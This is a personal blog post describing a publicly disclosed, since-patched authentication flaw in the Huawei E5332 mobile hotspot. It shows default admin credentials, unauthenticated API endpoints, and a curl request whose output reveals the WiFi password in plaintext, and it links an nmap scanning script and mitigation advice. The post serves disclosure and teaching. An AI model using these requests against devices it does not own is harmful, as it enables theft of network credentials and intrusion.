Hacking Econet 3G MIFI for fun and mostly more fun. Huawei E5332

Hacking Econet Huawei E5332 Modems.

Image: TechZim

So I got one of these babies last year from a friend. I've been using it for a few months now, and I decided to try to break into one. To be fair calling them Econet modems is a bit of oversell as they simply branded Huawei modems.


This blog post describes how to hack the Huawei E5332 modem to obtain the wifi password, change DMZ settings, Pin access code, Sim card lock and force the device to reboot by sending a specially crafted http request.


I should point out this vulnerability has been in the wild for a few years now and a quick search for "Huawei E5332 CVE" will return a few results. I decided to try out several of these vulnerabilities on my own modem and also wrote a nmap script to identify mobile routers that are vulnerable and obtain device information.

Proof of Concept Video

About Device

Huawei E5332 Mobile WiFi is a high-speed packet access mobile hotspot. It is a multi-mode wireless terminal for SOHO and business professionals.
 
You can connect the E5332 with the USB interface of a computer, or connect the E5332 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM network, you can surf the Internet and send/receive messages/emails cordlessly. The E5332 Router is fast, reliable, and easy to operate.Thus, mobile users can experience many new features and services with the unlocked E5332.
 

Huawei E5332 Mobile WiFi Features:

* HSPA+ (DL) data service of up to 21.6 Mbit/s
* HSPA+ (UL) data service of up to 5.76 Mbit/s
* HSDPA (DL) data service of up to 14.4 Mbit/s
* HSUPA (UL) data service of up to 5.76 Mbit/s
* UMTS data service of up to 384 kbit/s
* EDGE data service of up to 236.8 kbit/s
* GPRS data service of up to 85.6 kbit/s
* PS domain data service based on UMTS and GSM
* SMS based on CS/PS domain of GSM and UMTS
* Wi-Fi
* Built-in DHCP Server, DNS RELAY and NAT
* Plug and Play (PnP)
* Standard Micro USB interface
* LED indicators
* Built-in UMTS and WLAN high gain antenna
* External antenna interface, better signal
* Dimension: 92.8*60*13.8mm
* Weight: 91g
* Windows XP, Windows Vista, Windows 7, MAC OS X 10.5, 10.6 and 10.7

Usage

 When you connect to the mifi you can access the device control panel by navigating to http://mobilewifi.home/ on your browser. You can login using the default credentials
Username: admin
Password: admin

Once you've logged in you can read SMS messages, run USSD commands and access device settings.

Inspecting the network traffic you notice the site makes extensive use of AJAX calls return XML data which is then parsed to update the graphical user interface.

Some of the captured api calls include:

• http://192.168.1.1/api/monitoring/status
• http://192.168.1.1/api/monitoring/traffic-statistics
• http://192.168.1.1/api/wlan/basic-settings
• http://192.168.1.1/api/wlan/host-list
• http://192.168.1.1/api/monitoring/check-notifications

There are several other api calls and will covered in detail in the source code.

Each user is authenticated and tracked using cookies. The user is logged out if they are inactive for an extended timeframe.

Vulnerability

Replaying the network traffic even after the session has expired exposes several vulnerabilities in authentication. Any client connected to the device can query the api without been authenticated. This exposes the security of the entire network as Wifi passwords and other settings can be accessed by anyone connected to the device.

This vulnerability was first discovered on 2013-12-06 and made public on
2014-03-07. The initial vulnerability disclosure on ExploitDB by
SEC Consult Vulnerability Lab includes a detailed explanation on the multiple vulnerabilities the discovered.

Accessing WIFI Passwords

Probably the most interesting of all the vulnerabilities is the ability to access WIFI passwords in plaintext without any proper authentication. This takes the phrase "be careful who you trust on your network" to a whole new level. This information can be used to pivot onto other networks. Basically once you are connected to the mobile hotspot you can request the settings through a simple HTTP api call to the endpoint http://192.168.1.1/api/wlan/security-settings 


  trevor@base2theory:~$ curl http://192.168.1.1/api/wlan/security-settings -v | more
* Hostname was NOT found in DNS cache
*   Trying 192.168.1.1...
Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> GET /api/wlan/security-settings HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.1.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sat, 03 Jan 1970 22:44:39 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: -1
* Server IPWEBS/1.4.0 is not blacklisted
< Server: IPWEBS/1.4.0
< Cache-Control: no-cache
< Content-Length: 517
< Content-Type: text/html
< 
* Connection #0 to host 192.168.1.1 left intact
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA/WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>WEP</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>MIX</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>10518994</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response> 

The request returns a treasure trove. No authentication required. Just send an http request and it coughs up the plain text password.

Exploiting

This is a very old vulnerability and there aren't that many of these devices out there *hopefully* and its not exactly a risk vulnerability considering the attacker first needs access to the network. So its not one of those vulnerabilities you will find very often, but I thought I'd just write an nmap script for it. Automate everything ;)

Automate everything

  You can find the nmap script to scan for vulnerable huawei E5332 modems. Its hosted on Github -> Huawei E5332 MIFI NSE


If you want to see all actions you can perform without authentication. I recommend you checkout https://github.com/trevorsibanda/Huawei-Router_Python 

Solution and Mitigation

 

UPDATE YOUR DEVICE!!!  According to the security advisory released by Huawei this and other vulnerabilities were fixed in the version 21.344.27.00.1080 of the firmware on the devices.

Updating the device is the best option. If thats not an option you should be wary of who you admit onto your network if you use one of these outdated babies.

 

References & Sources


Huawei Security Advisory - http://www.huawei.com/en/psirt/security-advisories/hw-373056
ExploitDb Disclosure     - https://www.exploit-db.com/exploits/32161/
Background reading       - http://blog.philippklaus.de/2015/04/huawei-e5332-portable-umts-wifi-router-with-battery/